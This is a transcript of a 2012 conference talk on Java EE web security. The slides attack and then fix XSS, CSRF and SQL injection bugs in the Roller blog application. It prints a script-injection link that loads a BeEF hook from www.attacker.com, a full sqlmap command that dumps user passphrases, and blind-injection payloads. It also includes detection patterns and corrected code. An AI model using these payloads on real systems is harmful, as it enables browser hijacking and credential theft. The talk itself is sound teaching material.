Java EE Web Security By Example JAX 2012

Java EE Web Security By Example: Frank Kim

May 06, 2015


Learn how to exploit security vulnerabilities that are commonly found in the arsenal of malicious attackers. We won't simply talk about issues like XSS, CSRF and SQL Injection, but will have live demos showing how hackers exploit these potentially devastating defects using freely available tools. You'll see how to hack a real world open source application and explore bugs in commonly used open source frameworks. We also look at the source code and see how to fix these issues using secure coding principles. We will also discuss best practices that can be used to build security into your SDLC. Java developers and architects will learn how to find and fix security issues in their applications before hackers do.
Transcript
Page 1: Java EE Web Security By Example: Frank Kim

Java EE Web Security By Example

JAX 2012

Page 2: Java EE Web Security By Example: Frank Kim

About

• Frank Kim
  – Consultant, ThinkSec
  – Author, SANS Secure Coding in Java/JEE
  – SANS Application Security Curriculum Lead

Page 3: Java EE Web Security By Example: Frank Kim

What You Should Know

• Hacking is not hard
• Don’t trust any data
  – Assume that your users are evil!

Page 4: Java EE Web Security By Example: Frank Kim

Outline

• Web App Attack Refresher – XSS, CSRF, SQL Injection
• Testing – Hacking an open source app
• Secure Coding – Fixing security bugs

Page 5: Java EE Web Security By Example: Frank Kim

Cross-Site Scripting (XSS)

• Occurs when unvalidated data is displayed back to the browser
• Types of XSS
  – Stored
  – Reflected
  – Document Object Model (DOM) based

Page 6: Java EE Web Security By Example: Frank Kim


Cross-Site Request Forgery (CSRF)

Page 7: Java EE Web Security By Example: Frank Kim

SQL Injection (SQLi)

• Occurs when dynamic SQL queries are used
  – By injecting arbitrary SQL commands, attackers can extend the meaning of the original query
  – Can potentially execute any SQL statement on the database
• Very powerful
  – #1 on CWE/SANS Top 25 Most Dangerous Software Errors
  – #1 on OWASP Top 10

Page 8: Java EE Web Security By Example: Frank Kim

Outline

• Web App Attack Refresher – XSS, CSRF, SQL Injection
• Testing – Hacking an open source app
• Secure Coding – Fixing security bugs

Page 9: Java EE Web Security By Example: Frank Kim

What are We Testing?

• Installation of Roller 3.0
• Fake install of SANS AppSec Street Fighter Blog
• Want to simulate the actions that a real attacker might take
  – There are definitely other avenues of attack
  – We're walking through one attack scenario

Page 10: Java EE Web Security By Example: Frank Kim

Attack Scenario

1) XSS to control the victim's browser
2) Combine XSS and CSRF to conduct a privilege escalation attack
   – Use escalated privileges to access another feature
3) Use SQL Injection to access the database directly

Page 11: Java EE Web Security By Example: Frank Kim


Spot the Vuln - XSS

Page 12: Java EE Web Security By Example: Frank Kim


XSS in head.jsp

Page 13: Java EE Web Security By Example: Frank Kim

Testing the "look" Param

• Admin pages include head.jsp
• The param is persistent for the session

Page 14: Java EE Web Security By Example: Frank Kim

XSS Exploitation

• Introducing BeEF
  – Browser Exploitation Framework
  – http://www.bindshell.net/tools/beef
• Uses XSS to hook the victim's browser
  – Log user keystrokes, view browsing history, execute JavaScript, etc.
  – Advanced attacks: Metasploit integration, browser exploits, etc.

Page 15: Java EE Web Security By Example: Frank Kim

XSS Exploitation Overview

(Diagram: Attacker and Victim)

1) Attacker sends link with evil BeEF script:
   http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>
2) Victim clicks evil link
3) Victim's browser sends data to attacker

Page 16: Java EE Web Security By Example: Frank Kim

BeEF XSS Demo

Page 17: Java EE Web Security By Example: Frank Kim


Spot the Vuln - CSRF

Page 18: Java EE Web Security By Example: Frank Kim

CSRF in UserAdmin.jsp

Want to use CSRF to change this field

Page 19: Java EE Web Security By Example: Frank Kim

CSRF Demo

Page 20: Java EE Web Security By Example: Frank Kim


Spot the Vuln – SQL Injection

Page 21: Java EE Web Security By Example: Frank Kim


SQL Injection in UserServlet

Page 22: Java EE Web Security By Example: Frank Kim

SQL Injection Testing

• UserServlet is vulnerable to SQLi
  http://localhost:8080/roller/roller-ui/authoring/user

No results

Page 23: Java EE Web Security By Example: Frank Kim

Exploiting SQL Injection

• Introducing sqlmap
  – http://sqlmap.sourceforge.net
• Tool that automates detection and exploitation of SQL Injection vulns
  – Supports MySQL, Oracle, PostgreSQL, MS SQL Server
  – Supports blind, inband, and batch queries
  – Fingerprint/enumeration: dump db schemas, tables/column names, data, db users, etc.
  – Takeover features: read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc.

Page 24: Java EE Web Security By Example: Frank Kim

sqlmap Syntax

• Dump userids and passwords

python sqlmap.py -u "http://localhost:8080/roller/roller-ui/authoring/user?startsWith=f%25" --cookie "username=test; JSESSIONID=<INSERT HERE>" --drop-set-cookie -p startsWith --dump -T rolleruser -C username,passphrase -v 2

Page 25: Java EE Web Security By Example: Frank Kim

SQL Injection Demo

Page 26: Java EE Web Security By Example: Frank Kim

How it Works

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy

Page 27: Java EE Web Security By Example: Frank Kim


Step By Step [0]

SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;

returns ilovethetajmahal

Page 28: Java EE Web Security By Example: Frank Kim

Step By Step [1]

select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1);
returns i

select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1);
returns l

select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1);
returns o

Page 29: Java EE Web Security By Example: Frank Kim

Step By Step [2]

select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1));
returns 105

select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1));
returns 108

select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1));
returns 111
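Seen from the defender's side, the probes above leave a recognisable shape in the access log: ORD(MID(...)) compared against a changing constant, followed by a closing tautology. This added example (not from the slides or from Roller) scans constructed, URL-encoded log lines for that shape and for the look= script injection shown on slide 15; the class name, the log format and the Java 10+ URLDecoder overload are assumptions.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

// Hypothetical scanner; the signatures follow the requests shown on the slides.
public final class ProbeScanner {
    // Boolean-blind probe shape (slide 26): ORD(MID(...)) compared to a number
    static final Pattern BLIND_SQLI =
        Pattern.compile("(?i)\\bAND\\s+ORD\\(MID\\(.*\\)\\)\\s*[<>=]+\\s*\\d+");
    // Closing tautology sqlmap appends so the injected WHERE clause still parses
    static final Pattern TAUTOLOGY = Pattern.compile("(?i)AND\\s+'(\\w+)'\\s+LIKE\\s+'\\1");
    // Script tag injected through the 'look' parameter (slide 15)
    static final Pattern LOOK_XSS = Pattern.compile("(?i)[?&]look=[^&]*<script");

    // Constructed access-log lines (not from the slides); requests are URL-encoded
    static final String[] SAMPLE_LOG = {
        "10.0.0.5 \"GET /roller/roller-ui/authoring/user?startsWith=f%25 HTTP/1.1\" 200",
        "10.0.0.9 \"GET /roller/roller-ui/authoring/user?startsWith=f%25%27%20AND%20ORD(MID((SELECT%20IFNULL(CAST(passphrase%20AS%20CHAR(10000)),%20CHAR(32))%20FROM%20roller.rolleruser%20LIMIT%202,%201),%201,%201))%20%3E%20103%20AND%20%27neEy%27%20LIKE%20%27neEy HTTP/1.1\" 200",
        "10.0.0.9 \"GET /roller/roller-ui/yourWebsites.do?look=%22%3E%3Cscript%20src%3D%22http://www.attacker.com/beef/hook/beefmagic.js.php%22%3E%3C/script%3E HTTP/1.1\" 200",
    };

    // Label one log line; decode first because the log stores the raw request URL
    static String classify(String rawLine) {
        String line = URLDecoder.decode(rawLine, StandardCharsets.UTF_8); // Java 10+
        if (LOOK_XSS.matcher(line).find()) return "xss-look-param";
        if (BLIND_SQLI.matcher(line).find() || TAUTOLOGY.matcher(line).find()) return "blind-sqli";
        return "ok";
    }

    // Returns "<client> <verdict>" for every line that is not clean
    static List<String> scan(String[] lines) {
        List<String> hits = new ArrayList<>();
        for (String line : lines) {
            String verdict = classify(line);
            if (!verdict.equals("ok")) {
                hits.add(line.substring(0, line.indexOf(' ')) + " " + verdict);
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        for (String hit : scan(SAMPLE_LOG)) System.out.println(hit);
    }
}
```

A real deployment would also count probes per client and path per minute, since a single boolean-blind extraction needs hundreds of near-identical requests.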

Page 30: Java EE Web Security By Example: Frank Kim

Attack Summary

1) XSS to control the victim's browser
2) Combine XSS and CSRF to conduct a privilege escalation attack
   – Use escalated privileges to access another feature
3) Use SQL Injection to access the database directly

Page 31: Java EE Web Security By Example: Frank Kim

Outline

• Web App Attack Refresher – XSS, CSRF, SQL Injection
• Testing – Hacking an open source app
• Secure Coding – Fixing security bugs

Page 32: Java EE Web Security By Example: Frank Kim

Data Validation (diagram)

Inbound data passes through Validation before the Application consumes it ("Should I be consuming this?"); outbound data passes through Encoding before the Application emits it ("Should I be emitting this?"). The same Validation and Encoding steps sit on both directions between the Application and the Data Store.

Page 33: Java EE Web Security By Example: Frank Kim

Output Encoding

• Encoding
  – Convert characters so they are treated as data and not special characters
• Must escape differently depending where data is displayed on the page
• XSS Prevention Cheat Sheet
  http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

Page 34: Java EE Web Security By Example: Frank Kim

Fix XSS in head.jsp

• Add URL encoding

<link rel="stylesheet" type="text/css" media="all" href="<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css" />

Page 35: Java EE Web Security By Example: Frank Kim

Fix CSRF in Update User Functionality

• UserAdmin.jsp – Add anti-CSRF token

<input type="hidden" name="<%= CSRFTokenUtil.SESSION_ATTR_KEY %>" value="<%= CSRFTokenUtil.getToken(request.getSession(false)) %>" >

• UserAdminAction.java – Check anti-CSRF token

if (!CSRFTokenUtil.isValid(req.getSession(false), req)) {
    return mapping.findForward("error");
}
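The slides call CSRFTokenUtil but never show it. Below is an added implementation behind those three calls (SESSION_ATTR_KEY, getToken, isValid); it is not Roller's or the author's code, and the token size, encoding and comparison method are assumptions.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;

// Hypothetical implementation matching the calls on the slide. Needs Java 8+
// for java.util.Base64.
public final class CSRFTokenUtil {
    // Session attribute name, reused as the hidden form field name
    public static final String SESSION_ATTR_KEY = "csrfToken";
    private static final SecureRandom RANDOM = new SecureRandom();

    private CSRFTokenUtil() {}

    // Returns the session's token, minting one on first use so every form
    // rendered in this session carries the same unguessable value.
    public static String getToken(HttpSession session) {
        if (session == null) throw new IllegalStateException("no session for CSRF token");
        synchronized (session) {
            String token = (String) session.getAttribute(SESSION_ATTR_KEY);
            if (token == null) {
                byte[] bytes = new byte[32];               // 256 bits of CSPRNG output
                RANDOM.nextBytes(bytes);
                token = Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
                session.setAttribute(SESSION_ATTR_KEY, token);
            }
            return token;
        }
    }

    // True only when the submitted field equals the token stored in the session.
    // A cross-site page cannot read the victim's token, so a forged request
    // cannot include it; a missing session or missing field also fails.
    public static boolean isValid(HttpSession session, HttpServletRequest req) {
        if (session == null) return false;
        String expected = (String) session.getAttribute(SESSION_ATTR_KEY);
        String actual = req.getParameter(SESSION_ATTR_KEY);
        if (expected == null || actual == null) return false;  // never issued or omitted
        // Constant-time comparison so response timing does not leak the token
        return MessageDigest.isEqual(expected.getBytes(StandardCharsets.UTF_8),
                                     actual.getBytes(StandardCharsets.UTF_8));
    }
}
```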

Page 36: Java EE Web Security By Example: Frank Kim

Fix SQL Injection in UserServlet.java

• Use parameterized queries correctly

if (startsWith == null || startsWith.equals("")) {
    query = "SELECT username, emailaddress FROM rolleruser";
    stmt = con.prepareStatement(query);
} else {
    query = "SELECT username, emailaddress FROM rolleruser WHERE username like ? or emailaddress like ?";
    stmt = con.prepareStatement(query);
    stmt.setString(1, startsWith + "%");
    stmt.setString(2, startsWith + "%");
}
rs = stmt.executeQuery();
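The same lookup as a complete method, added here as an example that is not Roller's code. It keeps the slide's fix and adds the caveat the slide leaves out: binding startsWith + "%" stops injection, but a % or _ typed by the user still acts as a LIKE wildcard, so those are escaped too. The class name, findUsers and the "!" escape character are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;

// Hypothetical helper around the slide's parameterized query.
public final class UserLookup {
    // Escape LIKE metacharacters so user input matches literally.
    // '!' is declared as the escape character in the query below (portable
    // across MySQL, PostgreSQL, Oracle and SQL Server, unlike backslash).
    static String escapeLike(String s) {
        return s.replace("!", "!!").replace("%", "!%").replace("_", "!_");
    }

    // Returns {username, emailaddress} rows; a null or empty prefix lists all users
    public static List<String[]> findUsers(Connection con, String startsWith) throws SQLException {
        boolean filtered = startsWith != null && !startsWith.isEmpty();
        String query = "SELECT username, emailaddress FROM rolleruser";
        if (filtered) {
            query += " WHERE username LIKE ? ESCAPE '!' OR emailaddress LIKE ? ESCAPE '!'";
        }
        List<String[]> rows = new ArrayList<>();
        // try-with-resources closes the statement and result set even on error
        try (PreparedStatement stmt = con.prepareStatement(query)) {
            if (filtered) {
                String pattern = escapeLike(startsWith) + "%";  // bound as data, never as SQL
                stmt.setString(1, pattern);
                stmt.setString(2, pattern);
            }
            try (ResultSet rs = stmt.executeQuery()) {
                while (rs.next()) {
                    rows.add(new String[] { rs.getString(1), rs.getString(2) });
                }
            }
        }
        return rows;
    }
}
```

With this in place the sqlmap payload from slide 26 is simply a (non-matching) prefix, and the passphrase column is never reachable from the request.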

Page 37: Java EE Web Security By Example: Frank Kim


Building Secure Software

Source: Microsoft SDL

Page 38: Java EE Web Security By Example: Frank Kim

Remember

• Hacking is not hard
• Don’t trust any data
  – Validate input
  – Encode output
  – Use CSRF tokens
  – Use parameterized queries

Page 39: Java EE Web Security By Example: Frank Kim
Page 40: Java EE Web Security By Example: Frank Kim


Thanks!

Frank Kim [email protected] @sansappsec